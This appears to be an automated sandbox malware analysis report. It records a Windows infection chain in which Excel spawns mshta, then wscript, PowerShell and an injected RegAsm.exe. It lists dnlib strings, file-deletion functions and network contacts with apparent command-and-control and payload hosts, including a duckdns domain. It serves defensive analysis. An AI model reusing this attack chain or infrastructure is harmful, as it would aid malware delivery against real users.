                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.484568461.0000000012648000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 0000000E.00000002.456488179.000000001C690000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.443270991.000000001246D000.00000004.00000800.00020000.00000000.sdmp
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,28_2_0040928E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,28_2_0041C322
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,28_2_0040C388
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,28_2_004096A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,28_2_00408847
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_00407877 FindFirstFileW,FindNextFileW,28_2_00407877
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0044E8F9 FindFirstFileExA,28_2_0044E8F9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,28_2_0040BB6B
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,28_2_00419B86
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,28_2_0040BD72
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 28_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,28_2_00407CD2

                  Software Vulnerabilities

                  Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\mshta.exe
                  Source: C:\Windows\System32\wscript.exe Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                  Source: global traffic DNS query: name: zhort.de
                  Source: global traffic DNS query: name: zhort.de
                  Source: global traffic DNS query: name: ia803104.us.archive.org
                  Source: global traffic DNS query: name: cloudsave.duckdns.org
                  Source: global traffic DNS query: name: geoplugin.net
                  Source: global traffic DNS query: name: zhort.de
                  Source: global traffic DNS query: name: ia803104.us.archive.org
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global traffic TCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global traffic TCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global traffic TCP traffic: 192.168.2.22:49171 -> 88.99.66.38:443
                  Source: global traffic TCP traffic: 192.168.2.22:49174 -> 88.99.66.38:443
                  Source: global traffic TCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global traffic TCP traffic: 192.168.2.22:49164 -> 192.3.193.155:80
                  Source: global traffic TCP traffic: 192.168.2.22:49166 -> 192.3.193.155:80
                  Source: global traffic TCP traffic: 192.168.2.22:49167 -> 192.3.193.155:80
                  Source: global traffic TCP traffic: 192.168.2.22:49169 -> 192.3.193.155:80
                  Source: global traffic TCP traffic: 192.168.2.22:49172 -> 178.237.33.50:80
                  Source: global traffic TCP traffic: 192.168.2.22:49175 -> 192.3.193.155:80
                  Source: global traffic TCP traffic: 192.168.2.22:49177 -> 192.3.193.155:80
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global traffic TCP traffic: 192.168.2.22:49163 -> 88.99.66.38:443
                  Source: global traffic TCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global traffic TCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global traffic TCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global traffic TCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global traffic TCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global traffic TCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global traffic TCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global traffic TCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global traffic TCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global traffic TCP traffic: 192.168.2.22:49165 -> 88.99.66.38:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49168 -> 207.241.232.154:443
                  Source: global traffic, TCP traffic: 192.168.2.22:49171 -> 88.99.66.38:443
                  Source: global traffic, TCP traffic: 192.168.2.22:49173 -> 88.99.66.38:443
                  Source: global traffic, TCP traffic: 192.168.2.22:49174 -> 88.99.66.38:443
                  Source: global traffic, TCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
                  Source: global trafficTCP traffic: 192.168.2.22:49176 -> 207.241.232.154:443
